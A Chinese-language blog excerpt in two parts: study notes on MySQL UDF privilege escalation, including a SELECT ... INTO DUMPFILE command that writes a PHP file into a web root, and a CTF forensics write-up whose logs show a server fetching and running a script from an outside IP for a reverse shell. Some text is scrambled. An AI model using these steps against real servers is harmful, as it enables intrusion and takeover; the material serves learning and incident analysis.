Mysql

mysql UDF提权 上次做题的时候遇到了各UDF提权没有做出来，遂补习，建立在已经获得基础权限需要提权到mysql的情况下 权限获取 简单罗列一些，这次主要研究UDF提权的手段。 1.sqlmap -os-shell 2.手工dumpfile 3.NDAY webshell 知道网站根目录 有mysqlroot权限 secure_file_priv 为空，无限制 secure_file_priv可以通过show global variables like '%secure_file_priv%';来查询，NULL不允许写入 V s a e r c i u a r b e l _ e f _ i n l a e m _ e p r i v V a l u e SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/www/wwwroot/192.168.56.102_8083/phpinfo.php'; 手动UDF UDF（User Defined Function）顾名思义用户自定义函数，一般形式是用c语言编写的动态链接库，windows为dll，linux为so，所以不准确的说UDF是一种C代码执行 ...

考的是对mysql下渗透方式的熟悉程度 1.黑客第一次写入的shell flag{关键字符串} 2.黑客反弹shell的ip flag{ip} 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 4.黑客获取的权限 flag{whoami后的值} 黑客反弹shell的ip mysql的渗透我能想到的方法无非是注入，和弱口令接管，先找到日志 root@xuanji:~# find / -name mysql /etc/init.d/mysql /etc/mysql /usr/bin/mysql /usr/lib/perl5/auto/DBD/mysql /usr/lib/perl5/DBD/mysql /usr/lib/mysql /usr/share/mysql /usr/share/php5/mysql /var/lib/mysql /var/lib/mysql/mysql /var/lib/php5/modules/apache2/enabled_by_maint/mysql /var/lib/php5/modules/cli/enabled_by_maint/mysql /var/lib/php5/modules/registry/mysql /var/log/mysql cat以后值得注意的内容是 sh: 1: curl: not found --2023-08-01 02:14:11-- http://192.168.100.13:771/ Connecting to 192.168.100.13:771... connected. HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9 Length: unspecified Saving to: 'index.html' 0K 2.46 =2.0s 2023-08-01 02:14:13 (2.46 B/s) - 'index.html' saved [5] /tmp/1.sh: line 1: --2023-08-01: command not found /tmp/1.sh: line 2: Connecting: command not found /tmp/1.sh: line 3: HTTP: command not found /tmp/1.sh: line 4: Length:: command not found /tmp/1.sh: line 5: Saving: command not found /tmp/1.sh: line 7: 0K: command not found /tmp/1.sh: line 9: syntax error near unexpected token `(' /tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]' 服务器从192.168.100.13下载了一个脚本并运行了cat一下脚本 ...